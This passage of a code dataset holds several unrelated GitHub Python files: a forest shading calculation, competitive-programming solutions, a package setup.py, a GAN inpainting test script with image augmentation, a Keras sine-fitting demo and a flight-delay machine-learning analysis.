np.genfromtxt(\"GillyShadingTIFull.csv\", dtype=float, delimiter=',', usecols=(0, 1, 2, 3, 4), unpack=True, skiprows=1)\n\n############################################################################\n#The Gilly Light Equaton\n\n#The Gille Shade Criterion Function (GSCF)\n\nRM = lambda x: np.array([[np.cos(x), -np.sin(x)], [np.sin(x), np.cos(x)]])\n\n[X, Y]+np.dot(RM(np.radians(-(SolAziNBGW(12,173)-210)))/np.tan(SolElvNBGW(12,173)),[-CW/200,HE])\n\n\n\ndef KMatrixFun(N=0, O=0, h=12, day=173, iter=len(X)):\n\tKMatrix = KMatrixCrown = KMatrixHeight = np.zeros([iter, 2]) \n\t\n\tfor i in xrange(iter):\n\t\tKMatrixCrown[i] = ([X[i], Y[i]]+np.dot(RM(np.radians(-(SolAziNBGW(h,day)-210)))/np.tan(SolElvNBGW(h,day)),[-CW[i]/200,HE[i]])-[N, O])/([X[i], Y[i]]+np.dot(RM(np.radians(-(SolAziNBGW(h,day)-210)))/np.tan(SolElvNBGW(h,day)),[-CW[i]/200,HE[i]-CH[i]])-[N, O])\n\t\tfor j in xrange(2):\n\t\t\tif KMatrixCrown[i, j] <= 0:\n\t\t\t\tKMatrixCrown[i, j] = 0\n\t\t\telse:\n\t\t\t\tKMatrixCrown[i, j] = 1\n\t\n\t\tKMatrixHeight[i] = ([X[i], Y[i]]+np.dot(RM(np.radians(-(SolAziNBGW(h,day)-210)))/np.tan(SolElvNBGW(h,day)),[0,HE[i]])-[N, O])/([X[i], Y[i]]+np.dot(RM(np.radians(-(SolAziNBGW(h,day)-210)))/np.tan(SolElvNBGW(h,day)),[0,HE[i]-CH[i]])-[N, O])\n\t\tfor j in xrange(2):\n\t\t\tif KMatrixHeight[i, j] <= 0:\n\t\t\t\tKMatrixHeight[i, j] = 0\n\t\t\telse:\n\t\t\t\tKMatrixHeight[i, j] = 1\n\t\t\t\n\t\tKMatrix[i] = KMatrixHeight[i]+KMatrixCrown[i]\n\t\n\treturn KMatrix\n\t\ndef ZetaUnitGrid(h=12, day=173, nmin=0, nmax=60, omin=0, omax=60, spacings=1):\n\tKMatrixTot = KMatrixTotTot = np.zeros([(nmax-nmin)/spacings,(omax-omin)/spacings])\n\t\n\twith warnings.catch_warnings():\n\t\twarnings.simplefilter(\"ignore\")\n\t\tfxn()\n\t\tfor i in xrange(nmin,nmax,spacings):\n\t\t\tfor j in xrange(omin,omax,spacings):\n\t\t\n\t\t\t\tKMatrixTot[i,j] = KMatrixFun(i, j, h, day)[i,0]+KMatrixFun(i, j, h, day)[i,1]\n\t\t\n\t\t\t\tfor i in xrange(int((nmax-nmin)/spacings)):\n\t\t\t\t\tif KMatrixTot[i,j] <= 0:\n\t\t\t\t\t\tKMatrixTot[i,j] = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tKMatrixTot[i,j] = 1\n\t\n\t\t\t\tif ((nmax-nmin)/spacings - KMatrixTot.sum()) <= 0:\n\t\t\t\t\tKMatrixTotTot[i,j] = 1\n\t\t\t\telse:\n\t\t\t\t\tKMatrixTotTot[i,j] = 0\n\t\t\t\t\n\treturn KMatrixTotTot\n\n\ndef GillyLightEquation():\n\tGillyTop = 0.0\n\tfor day in xrange(0,365):\n\t\thmax = (Dusk(day)-Dawn(day))/10\n\t\tfor h in xrange(int(hmax)):\n\t\t\tGillyTop += ZetaUnitGrid(Dusk(day)+h*hmax,day,0,1,0,1,1)\n\treturn GillyTop\n\t\ndef fxn():\n warnings.warn(\"deprecated\", DeprecationWarning)\n\n#KMatrixTotTot = ZetaUnitGrid(12,173,0,2,0,2,1)\n#area = quad(KMatrixTotTot[x,y,h,day,473], 0, 1, args=(x,y,h))\n\n\nGillyTop = GillyLightEquation()\n\nprint(GillyTop)\n#KMatrix = lambda X, Y, HE, CH, CW, Zenith, Azimuth: np.ceiling()\n\n","repo_name":"pacificgilly1992/ForestDynamicswithGLE","sub_path":"GLEbreakups.py","file_name":"GLEbreakups.py","file_ext":"py","file_size_in_byte":5004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21436997709","text":"# BFS Algorithm\n\nfrom collections import deque\n\ndef BFS():\n Max = 0\n\n queue = deque()\n for i in range(N):\n for j in range(M):\n if arr[i][j] == 1:\n queue.append((j, i))\n visited[i][j] = 0\n\n while queue:\n x, y = queue.popleft()\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if nx < 0 or ny < 0 or nx >= M or ny >= N: # 벽일 경우\n continue\n\n if visited[ny][nx] != 0:\n continue\n\n if arr[ny][nx] == 0:\n queue.append((nx, ny))\n visited[ny][nx] = visited[y][x] + 1\n arr[ny][nx] = 1\n Max = visited[ny][nx]\n\n return Max\n\n# input\nM, N = map(int, input().split())\narr = [list(map(int, input().split())) for _ in range(N)]\ndx = [1, -1, 0, 0] # 동서남북 이동, x축\ndy = [0, 0, -1, 1] # 동서남북 이동, y축\n\nvisited = []\nfor i in range(N):\n visited.append([])\n for j in range(M):\n visited[i].append(0)\n\nMax = BFS()\n\nfor i in range(N):\n for j in range(M):\n if arr[i][j] == 0:\n Max = -1\n break\n\nprint(Max)","repo_name":"Hunnibs/DataStructure-Algorithm_Python","sub_path":"BAEKJOON/7576.py","file_name":"7576.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71801678120","text":"# -*- coding: utf-8 -*-\nimport os\nimport re\nimport sys\n\nfrom setuptools import setup\n\n\ndef read(*args):\n return open(os.path.join(os.path.dirname(__file__), *args), encoding='utf8').read()\n\n\ndef extract_version(version_file):\n version_match = re.search(r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\", version_file, re.M)\n if version_match:\n return version_match.group(1)\n\n raise RuntimeError(\"Unable to find version string.\")\n\n\nif sys.version_info < (3, 7):\n sys.stderr.write('ERROR: You need Python 3.7 or later to install this package.\\n')\n exit(1)\n\nextras_require = {'plotting': ['matplotlib'],\n 'bloch_sphere_visualization': ['qutip', 'matplotlib'],\n 'fancy_progressbar': ['ipynbname', 'jupyter'],\n 'doc': ['jupyter', 'nbsphinx', 'numpydoc', 'sphinx', 'sphinx_rtd_theme'],\n 'tests': ['pytest>=4.6', 'pytest-cov', 'codecov']}\n\nextras_require['all'] = [dep for deps in extras_require.values() for dep in deps]\n\nsetup(name='filter_functions',\n version=extract_version(read('filter_functions', '__init__.py')),\n description='Package for efficient calculation of generalized filter functions',\n long_description=read('README.md'),\n long_description_content_type='text/markdown',\n url='https://github.com/qutech/filter_functions',\n author='Quantum Technology Group, RWTH Aachen University',\n author_email='tobias.hangleiter@rwth-aachen.de',\n packages=['filter_functions'],\n package_dir={'filter_functions': 'filter_functions'},\n install_requires=['numpy', 'scipy', 'opt_einsum', 'sparse', 'tqdm'],\n extras_require=extras_require,\n test_suite='tests',\n classifiers=[\n 'Programming Language :: Python :: 3',\n 'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)',\n 'Operating System :: OS Independent',\n 'Topic :: Scientific/Engineering :: Physics',\n ])\n","repo_name":"qutech/filter_functions","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"18"} +{"seq_id":"9828068600","text":"from __future__ import print_function\nimport numpy as np\nfrom psnr import psnr\nimport argparse\nimport os\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nfrom torch.autograd import Variable\nimport numpy as np\nfrom model import _netG\n\nfrom PIL import Image, ImageFilter,ImageOps\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--dataset', default='streetview',\n help='cifar10 | lsun | imagenet | folder | lfw ')\nparser.add_argument('--dataroot', default='dataset/val/',\n help='path to dataset')\nparser.add_argument('--workers', type=int,\n help='number of data loading workers', default=2)\nparser.add_argument('--batchSize', type=int,\n default=100, help='input batch size')\nparser.add_argument('--imageSize', type=int, default=128,\n help='the height / width of the input image to network')\nparser.add_argument('--nz', type=int, default=100,\n help='size of the latent z vector')\nparser.add_argument('--ngf', type=int, default=64)\nparser.add_argument('--ndf', type=int, default=64)\nparser.add_argument('--nc', type=int, default=3)\nparser.add_argument('--niter', type=int, default=25,\n help='number of epochs to train for')\nparser.add_argument('--lr', type=float, default=0.0002,\n help='learning rate, default=0.0002')\nparser.add_argument('--beta1', type=float, default=0.5,\n help='beta1 for adam. default=0.5')\nparser.add_argument('--cuda', action='store_true', help='enables cuda')\nparser.add_argument('--ngpu', type=int, default=1,\n help='number of GPUs to use')\nparser.add_argument('--netG', default='model/netG_streetview.pth',\n help=\"path to netG (to continue training)\")\nparser.add_argument('--netD', default='',\n help=\"path to netD (to continue training)\")\nparser.add_argument('--outf', default='.',\n help='folder to output images and model checkpoints')\nparser.add_argument('--manualSeed', type=int, help='manual seed')\n\nparser.add_argument('--nBottleneck', type=int, default=4000,\n help='of dim for bottleneck of encoder')\nparser.add_argument('--overlapPred', type=int,\n default=4, help='overlapping edges')\nparser.add_argument('--nef', type=int, default=64,\n help='of encoder filters in first conv layer')\nparser.add_argument('--wtl2', type=float, default=0.999,\n help='0 means do not use else use with this weight')\nopt = parser.parse_args()\nprint(opt)\n\n\nnetG = _netG(opt)\nnetG.load_state_dict(torch.load(\n opt.netG, map_location=lambda storage, location: storage)['state_dict'])\nnetG.eval()\n\ntransform = transforms.Compose([transforms.Scale(opt.imageSize),\n transforms.CenterCrop(opt.imageSize),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\ndataset = dset.ImageFolder(root=opt.dataroot, transform=transform)\nassert dataset\ndataloader = torch.utils.data.DataLoader(dataset, batch_size=opt.batchSize,\n shuffle=True, num_workers=int(opt.workers))\n\n\ninput_real = torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize)\ninput_cropped = torch.FloatTensor(\n opt.batchSize, 3, opt.imageSize, opt.imageSize)\nreal_center = torch.FloatTensor(\n opt.batchSize, 3, int(opt.imageSize/2), int(opt.imageSize/2))\n\ncriterionMSE = nn.MSELoss()\n\nif opt.cuda:\n netG.cuda()\n input_real, input_cropped = input_real.cuda(), input_cropped.cuda()\n criterionMSE.cuda()\n real_center = real_center.cuda()\n\ninput_real = Variable(input_real)\ninput_cropped = Variable(input_cropped)\nreal_center = Variable(real_center)\n\ndataiter = iter(dataloader)\nreal_cpu, _ = dataiter.next()\n\ninput_real.data.resize_(real_cpu.size()).copy_(real_cpu)\ninput_cropped.data.resize_(real_cpu.size()).copy_(real_cpu)\nreal_center_cpu = real_cpu[:, :, int(opt.imageSize/4):int(opt.imageSize/4) +\n int(opt.imageSize/2), int(opt.imageSize/4):int(opt.imageSize/4)+int(opt.imageSize/2)]\nreal_center.data.resize_(real_center_cpu.size()).copy_(real_center_cpu)\n\n#TODO: preprocessing the images\nmode = 2\nrecon_image = None\n#DA = DataAugmentation.DataAugmentation()\n#input_cropped_edited = None\nif (mode ==1): #decolor\n print(input_cropped.shape)\n input_cropped_edited = [transforms.ToPILImage()(x) for x in input_cropped]\n input_cropped_edited = [ImageOps.grayscale(x) for x in input_cropped_edited]\n #input_cropped_edited = [transforms.Grayscale()(x) for x in input_cropped_edited]\n input_cropped_edited = [transforms.ToTensor()(x) for x in input_cropped_edited]\n input_cropped_edited = torch.stack(input_cropped_edited)\n print(input_cropped_edited.shape)\n recon_image = input_cropped_edited.clone()\n for i in range(3):\n input_cropped[:,i,:,:] = input_cropped_edited[:,0,:,:]\n #vutils.save_image(input_cropped,'./data_augmentation/decolor/cut1.png')\nelif (mode==2): #flip\n input_cropped= torch.flip(input_cropped,dims=[3])\n print(input_cropped.shape)\n #vutils.save_image(real_cpu[0], 'mode_2_orgi.png', normalize=True)\n #vutils.save_image(input_cropped[0],'mode_2_flipped.png',normalize=True)\nelif (mode==3): #Gaussian filter\n input_cropped_edited = [transforms.ToPILImage()(x) for x in input_cropped]\n input_cropped_edited = [x.filter(ImageFilter.GaussianBlur(radius=3)) for x in input_cropped_edited]\n input_cropped_edited = [transforms.ToTensor()(x) for x in input_cropped_edited]\n input_cropped_edited = torch.stack(input_cropped_edited)\n input_cropped = input_cropped_edited\nelif (mode==4): #Median filter\n input_cropped_edited = [transforms.ToPILImage()(x) for x in input_cropped]\n input_cropped_edited = [x.filter(ImageFilter.MedianFilter(size=3))for x in input_cropped_edited]\n input_cropped_edited = [transforms.ToTensor()(x) for x in input_cropped_edited]\n input_cropped_edited = torch.stack(input_cropped_edited)\n input_cropped = input_cropped_edited\nelif (mode==5): #Egde enhance\n input_cropped_edited = [transforms.ToPILImage()(x) for x in input_cropped]\n input_cropped_edited = [x.filter(ImageFilter.EDGE_ENHANCE)for x in input_cropped_edited]\n input_cropped_edited = [transforms.ToTensor()(x) for x in input_cropped_edited]\n input_cropped_edited = torch.stack(input_cropped_edited)\n input_cropped = input_cropped_edited\nelif (mode==6):#rotate\n input_cropped= torch.rot90(input_cropped,dims=[2,3])\n print(input_cropped.shape)\n\n#crop the image\ninput_cropped.data[:, 0, int(opt.imageSize/4)+opt.overlapPred:int(opt.imageSize/4)+int(opt.imageSize/2)-opt.overlapPred,\n int(opt.imageSize/4)+opt.overlapPred:int(opt.imageSize/4)+int(opt.imageSize/2)-opt.overlapPred] = 2*117.0/255.0 - 1.0\ninput_cropped.data[:, 1, int(opt.imageSize/4)+opt.overlapPred:int(opt.imageSize/4)+int(opt.imageSize/2)-opt.overlapPred,\n int(opt.imageSize/4)+opt.overlapPred:int(opt.imageSize/4)+int(opt.imageSize/2)-opt.overlapPred] = 2*104.0/255.0 - 1.0\ninput_cropped.data[:, 2, int(opt.imageSize/4)+opt.overlapPred:int(opt.imageSize/4)+int(opt.imageSize/2)-opt.overlapPred,\n int(opt.imageSize/4)+opt.overlapPred:int(opt.imageSize/4)+int(opt.imageSize/2)-opt.overlapPred] = 2*123.0/255.0 - 1.0\n\n\nvutils.save_image(real_cpu[0], 'mode_orgi.png', normalize=True)\nvutils.save_image(input_cropped[0],'mode_flipped.png',normalize=True)\n\n'''\nrgb_weights = torch.FloatTensor([0.2989, 0.5870, 0.1140]).resize_(torch.Size([3,1]))\nfor i in range(100):\n temp_size = input_cropped.data[i,:,:,:].size()\n temp_size2 = torch.Size([128,128,3])\n m = input_cropped.data[i,:,:,:].resize_(temp_size2)\n print(m.size(),rgb_weights.size())\n m = torch.mm(input_cropped.data[i,:,:,:],rgb_weights)\n input_cropped.data[i,:,:,:].resize_(t)\n \n t = np.copy(input_cropped.data[i,:,:,:])\n t = np.reshape(t,(128,128,3))\n t= np.dot(t,rgb_weights)\n input_cropped.data[i,:,:,:] = np.reshape(t,(3, 128,128)) \n'''\n \n#call the model and run\nprint(input_cropped.shape)\n#vutils.save_image(input_cropped.data,\n# 'val_cropped_samples.png', normalize=True)\nfake = netG(input_cropped)\nerrG = criterionMSE(fake, real_center)\nif (mode !=1):\n recon_image = input_cropped.clone()\n#original\n#recon_image.data[:, :, int(opt.imageSize/4):int(opt.imageSize/4) + int(opt.imageSize/2),\n# int(opt.imageSize/4):int(opt.imageSize/4)+int(opt.imageSize/2)] = fake.data\n#edited for decolor\n#fake.data[:,0,:,:] += fake.data[:,1,:,:]+fake.data[:,2,:,:]\n\nif (mode!=1):\n recon_image.data[:, :, int(opt.imageSize/4):int(opt.imageSize/4) + int(opt.imageSize/2),\n int(opt.imageSize/4):int(opt.imageSize/4)+int(opt.imageSize/2)] = fake.data\nfile_path = ''\nif (mode==1):\n fake_edited = [transforms.ToPILImage()(x) for x in fake.data]\n fake_edited = [ImageOps.grayscale(x) for x in fake_edited]\n #input_cropped_edited = [transforms.Grayscale()(x) for x in input_cropped_edited]\n fake_edited = [transforms.ToTensor()(x) for x in fake_edited]\n fake_edited = torch.stack(fake_edited)\n \n recon_image.data[:, :, int(opt.imageSize/4):int(opt.imageSize/4) + int(opt.imageSize/2),\n int(opt.imageSize/4):int(opt.imageSize/4)+int(opt.imageSize/2)] = fake_edited\n #vutils.save_image(recon_image,'./data_augmentation/decolor/fake.png')\n \n #recon_image=recon_image[:,0,:,:].resize_(torch.Size([100, 1, 128, 128]))\n file_path = './data_augmentation/decolor/'\nelif(mode==2):\n file_path = './data_augmentation/flip/'\nelif(mode==3):\n file_path = './data_augmentation/guassian/'\nelif(mode==4):\n file_path = './data_augmentation/medianFilter/'\nelif(mode==5):\n file_path = './data_augmentation/edgeEnhance/'\nelif(mode==6):\n file_path = './data_augmentation/rotate/'\nvutils.save_image(fake.data[0],'center.png',normalize=True)\nvutils.save_image(real_cpu, file_path+'val_real_samples.png', normalize=True)\nvutils.save_image(input_cropped.data,\n file_path+'val_cropped_samples.png', normalize=True)\nvutils.save_image(recon_image.data, file_path+'val_recon_samples.png', normalize=True)\np = 0\nl1 = 0\nl2 = 0\nif (mode==6):\n fake = torch.rot90(fake,dims=[2,3])\n fake = torch.rot90(fake,dims=[2,3])\n fake = torch.rot90(fake,dims=[2,3])\nif (mode==2):\n fake= torch.flip(fake,dims=[3])\nfake = fake.data.numpy()\nreal_center = real_center.data.numpy()\n\nt = real_center - fake\n\nl2 = np.mean(np.square(t))\nl1 = np.mean(np.abs(t))\nreal_center = (real_center+1)*127.5\nfake = (fake+1)*127.5\n\nfor i in range(opt.batchSize):\n p = p + psnr(real_center[i].transpose(1, 2, 0), fake[i].transpose(1, 2, 0))\n\n#print results session\nif(mode==1):\n print(\"Decolor the image!\")\nelif (mode==2):\n print(\"Flip the image!\")\nelif (mode==3):\n print('Guassian blur the image!')\nelif (mode==4):\n print('Median fliter!')\nelif (mode==5):\n print('Edge enhancement!')\nelif (mode==6):\n print('Rotate the image!')\nprint(\"l2: \",l2)\n\nprint(\"l1: \",l1)\n\nprint(p/opt.batchSize)\n","repo_name":"boyangx98/442Project","sub_path":"model1_dataAugmentation/Model1withDataAugmentation/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":11415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34202987119","text":"import sys\nfrom collections import deque, Counter, defaultdict\nfrom itertools import product\nsys.setrecursionlimit(5 * 10 ** 5)\n# from pypyjit import set_param\n# set_param('max_unroll_recursion=-1')\ninput = lambda: sys.stdin.readline().rstrip()\nii = lambda: int(input())\nmi = lambda: map(int, input().split())\nli = lambda: list(mi())\ninf = 2 ** 63 - 1\n\ndef solve(N: int, A: \"List[int]\"):\n A.sort()\n q = deque(A)\n r = q.pop()\n l = q.popleft()\n ans = abs(l-r)\n while q:\n next = []\n next.append((abs(q[0]-l), 0, q[0], r))\n next.append((abs(q[0]-r), 0, l, q[0]))\n next.append((abs(q[-1]-l), -1, q[-1], r))\n next.append((abs(q[-1]-r), -1, l, q[-1]))\n next.sort(key=lambda x:x[0], reverse=True)\n ans += next[0][0]\n if next[0][1] ==0:\n q.popleft()\n else: \n q.pop()\n l = next[0][2] \n r = next[0][3] \n\n print(ans)\n\n\ndef main():\n N = ii() # type: int\n A =[ii() for _ in range(N)]\n\n solve(N, A)\n return\n\nmain()\n","repo_name":"masahiro-999/atcoder-workspace","sub_path":"tenka1-2018/C/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74708313961","text":"from keras.models import Sequential\nfrom keras.layers import Dense\nimport numpy as np\nimport matplotlib.pylab as plt\n\n# Create dataset\nx = np.arange(0, np.pi * 2, 0.1)\ny = np.sin(x)\n\n# Some parameters\nACTIVE_FUN = 'tanh'\nBATCH_SIZE = 1\nVERBOSE=1\n\n# Create the model\nmodel = Sequential()\nmodel.add(Dense(40, input_shape=(1,), activation=ACTIVE_FUN))\nmodel.add(Dense(20, activation=ACTIVE_FUN))\nmodel.add(Dense(64, activation=ACTIVE_FUN))\nmodel.add(Dense(1))\n\n# Compile the model\nmodel.compile(loss='mean_squared_error', optimizer='sgd', metrics=['mean_squared_error'])\n\n# Fit the model\nmodel.fit(x, y, epochs=1500, batch_size=BATCH_SIZE, verbose=VERBOSE)\n\n# Evaluate the model\nscores = model.evaluate(x, y, verbose=VERBOSE)\nprint('%s: %.2f%%' % (model.metrics_names[1], scores[1] * 100))\n\n# Make predictions\nxnext = np.arange(np.pi * 2, np.pi * 4, 0.1)\nynext = np.sin(x)\ny_pred = model.predict(xnext)\ny_predOnTrain = model.predict(x)\n# Plot\nplt.plot(x, y, color='blue', linewidth=1, markersize='1', label = \"training data\")\nplt.plot(xnext, y_pred, color='green', linewidth=1, markersize='1', label = \"unseen x + predictedY on x\")\nplt.plot(xnext, ynext, 'm.', linewidth=1, markersize='1', label = \"unseen x, y\")\nplt.plot(x, y_predOnTrain, color='yellow', linewidth=1, markersize='1', label = \"x, predictedY on x\")\nplt.xlabel('Angle [rad]')\nplt.ylabel('sin(x)')\nplt.axis('tight')\nplt.show()","repo_name":"Chilibonitsu/ML-mlflow-AND-OR-XOR-plus-Sine-Wave-prediction","sub_path":"timeSeries mlflow/timeSeries betterSin.py","file_name":"timeSeries betterSin.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21094170579","text":"class Solution(object):\n def reverse(self, x):\n \"\"\"\n :type x: int\n :rtype: int\n \"\"\"\n neg = 1 if x >= 0 else -1\n x *= neg\n rev_x = 0\n while x > 0:\n rev_x = rev_x*10 + x%10\n x = x/10\n result = rev_x*neg if rev_x <= 2147483647 else 0\n return result\n","repo_name":"466152112/LeetCode","sub_path":"Python/reverseInteger.py","file_name":"reverseInteger.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"29211673363","text":"from database import *\r\nfrom sqlalchemy.orm import sessionmaker\r\nimport pandas as pd\r\nimport seaborn as sns\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.pipeline import Pipeline\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom datetime import datetime\r\nfrom sqlalchemy import and_\r\n\r\nif __name__ == \"__main__\":\r\n engine = create_engine('postgresql://postgres:marzipan@localhost/airInfoDB', echo=True)\r\n meta = MetaData(schema='warehouse')\r\n Base.metadata.create_all(engine)\r\n Session = sessionmaker(bind=engine)\r\n session = Session()\r\n\r\n factors1 = ['month', 'dimairlinesid', 'scheduleddep', 'originairportid', 'destairportid',\r\n 'scheduledtime', 'distance', 'scheduledarrival', 'arrivaltime', 'diverted', 'arrivaldelay']\r\n query = session.query(Flight).filter(and_(Flight.id <= 300000, Flight.id % 3 == 0))\r\n factorsArrays = [[] for _ in range(11)]\r\n for i in query.all():\r\n queryMonth = session.query(Date).filter(Date.id == i.dimdatesid).one()\r\n factorsArrays[0].append(queryMonth.month)\r\n for j in range(1, 11):\r\n eval(f\"factorsArrays[{j}].append(i.{factors1[j]})\")\r\n\r\n df = pd.DataFrame(factorsArrays)\r\n df = df.T\r\n df.columns = factors1\r\n print(df)\r\n\r\n labels = sorted(list(pd.unique(df['dimairlinesid'])))\r\n labelsTextQuery = session.query(Airline)\r\n labelsText = [labelsTextQuery.filter(Airline.id == i).one().airlinename for i in [int(k) for k in list(labels)]]\r\n print(labelsText)\r\n\r\n divertedCount = df[df['diverted'] == True]\r\n print(f'Diverted = {divertedCount.diverted.count()} out of {df.diverted.count()}')\r\n\r\n df = df.fillna(df.mean())\r\n print(df)\r\n\r\n\r\n def getStats(group):\r\n return {'min': group.min(), 'max': group.max(),\r\n 'count': group.count(), 'mean': group.mean()}\r\n\r\n\r\n globalStats = df['arrivaldelay'].groupby(df['dimairlinesid']).apply(getStats).unstack()\r\n globalStats = globalStats.sort_index()\r\n globalStats.index = labelsText\r\n globalStats = globalStats.sort_values('count')\r\n print(globalStats)\r\n\r\n globalStats.plot(y='count', kind='bar')\r\n plt.show()\r\n\r\n fig, ax = plt.subplots(figsize=(8, 8))\r\n wedges, texts, autotexts = ax.pie(df.groupby('dimairlinesid').mean()['arrivaldelay'], labels=labels,\r\n autopct='%1.1f%%',\r\n textprops=dict(color='w'), colors=[\"#025464\", \"#E57C23\", \"#F266AB\", \"#2CD3E1\",\r\n \"#643843\", \"#1B9C85\", \"#4C4C6D\", \"#0C134F\",\r\n \"#99A98F\", \"#B04759\", \"#FEFF86\", \"#212A3E\",\r\n \"#9384D1\", \"#263A29\", \"#B2A4FF\", \"#000000\"])\r\n\r\n ax.set_title('Average delay by airline')\r\n legend = ax.legend(wedges, labelsText,\r\n title='Airline',\r\n loc='center left',\r\n bbox_to_anchor=(1, 0, 0, 1))\r\n plt.setp(autotexts, size=12, weight='bold')\r\n plt.show()\r\n fig.savefig('mean-piechart', bbox_extra_artists=(legend,), bbox_inches='tight')\r\n\r\n fig, ax = plt.subplots(figsize=(8, 8))\r\n wedges, texts, autotexts = ax.pie(df.groupby('dimairlinesid').count()['arrivaldelay'], labels=labels,\r\n autopct='%1.1f%%',\r\n textprops=dict(color='w'), colors=[\"#025464\", \"#E57C23\", \"#F266AB\", \"#2CD3E1\",\r\n \"#643843\", \"#1B9C85\", \"#4C4C6D\", \"#0C134F\",\r\n \"#99A98F\", \"#B04759\", \"#FEFF86\", \"#212A3E\",\r\n \"#9384D1\", \"#263A29\", \"#B2A4FF\", \"#000000\"])\r\n\r\n ax.set_title('Number of flights by airline')\r\n legend = ax.legend(wedges, labelsText,\r\n title='Airline',\r\n loc='center left',\r\n bbox_to_anchor=(1, 0, 0, 1))\r\n plt.setp(autotexts, size=12, weight='bold')\r\n plt.show()\r\n fig.savefig('count-piechart', bbox_extra_artists=(legend,), bbox_inches='tight')\r\n\r\n sns.jointplot(x=df.scheduledarrival, y=df.arrivaltime)\r\n plt.show()\r\n\r\n corr = df.corr()\r\n sns.heatmap(corr)\r\n plt.show()\r\n\r\n result = []\r\n for row in df.arrivaldelay:\r\n if row > 15:\r\n result.append(1)\r\n else:\r\n result.append(0)\r\n\r\n df['result'] = result\r\n print(df)\r\n print(df.value_counts('result'))\r\n\r\n data = df.values\r\n X, y = data[:, :-4], data[:, -1]\r\n y = y.astype(int)\r\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30, random_state=15)\r\n standardizer = StandardScaler()\r\n X_train, X_test = standardizer.fit_transform(X_train), standardizer.fit_transform(X_test)\r\n\r\n predResults = []\r\n clf = DecisionTreeClassifier()\r\n time1 = datetime.now()\r\n clf = clf.fit(X_train, y_train)\r\n time2 = datetime.now()\r\n print(f'Decision Tree training time = {time2 - time1}')\r\n pred = clf.predict(X_test)\r\n time1 = datetime.now()\r\n print(f'Decision Tree evaluation for the training set = {clf.score(X_train, y_train):.2%}')\r\n predResults.append(clf.score(X_test, y_test)*100)\r\n print(f'Decision Tree evaluation for the test set = {predResults[0]:.2%}')\r\n print(f'Decision Tree prediction time = {time1 - time2}')\r\n sns.heatmap(confusion_matrix(y_test, pred), annot=True)\r\n plt.show()\r\n\r\n knn = KNeighborsClassifier(n_neighbors=5, n_jobs=-1)\r\n pipe = Pipeline([(\"standardizer\", standardizer), (\"knn\", knn)])\r\n search_space = [{\"knn__n_neighbors\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]}]\r\n classifier = GridSearchCV(pipe, search_space, cv=5, verbose=0).fit(X_train, y_train)\r\n best = classifier.best_estimator_.get_params()[\"knn__n_neighbors\"]\r\n print(\"\\nThe best K for KNN =\", best)\r\n\r\n time1 = datetime.now()\r\n knn = KNeighborsClassifier(n_neighbors=best, n_jobs=-1).fit(X_train, y_train)\r\n time2 = datetime.now()\r\n print(f'KNN training time = {time2 - time1}')\r\n pred = knn.predict(X_test)\r\n time1 = datetime.now()\r\n print(f'KNN evaluation for the training set = {knn.score(X_train, y_train):.2%}')\r\n predResults.append(knn.score(X_test, y_test)*100)\r\n print(f'KNN evaluation for the test set = {predResults[1]:.2%}')\r\n print(f'KNN prediction time = {time1 - time2}')\r\n sns.heatmap(confusion_matrix(y_test, pred), annot=True)\r\n plt.show()\r\n\r\n time1 = datetime.now()\r\n svc = SVC(kernel=\"rbf\").fit(X_train, y_train)\r\n time2 = datetime.now()\r\n print(f'SVC training time = {time2 - time1}')\r\n pred = svc.predict(X_test)\r\n time1 = datetime.now()\r\n print(f'\\nSVC evaluation for the training set = {svc.score(X_train, y_train):.2%}')\r\n predResults.append(svc.score(X_test, y_test)*100)\r\n print(f'SVC evaluation for the test set = {predResults[2]:.2%}')\r\n print(f'SVC prediction time = {time1 - time2}')\r\n sns.heatmap(confusion_matrix(y_test, pred), annot=True)\r\n plt.show()\r\n\r\n x_st = StandardScaler().fit_transform(X)\r\n kmeans = KMeans(n_clusters=2, max_iter=500, algorithm=\"lloyd\", random_state=1)\r\n kmeans.fit(x_st)\r\n time1 = datetime.now()\r\n predictKmeans = kmeans.predict(x_st)\r\n time2 = datetime.now()\r\n sns.heatmap(confusion_matrix(y, predictKmeans), annot=True)\r\n plt.show()\r\n\r\n ck = 0\r\n for i in range(len(y)):\r\n if y[i] == predictKmeans[i]:\r\n ck += 1\r\n print(f\"\\nK-Means Clustering evaluation = {ck / len(y) * 100}%\")\r\n print(f'K-Means prediction time = {time2 - 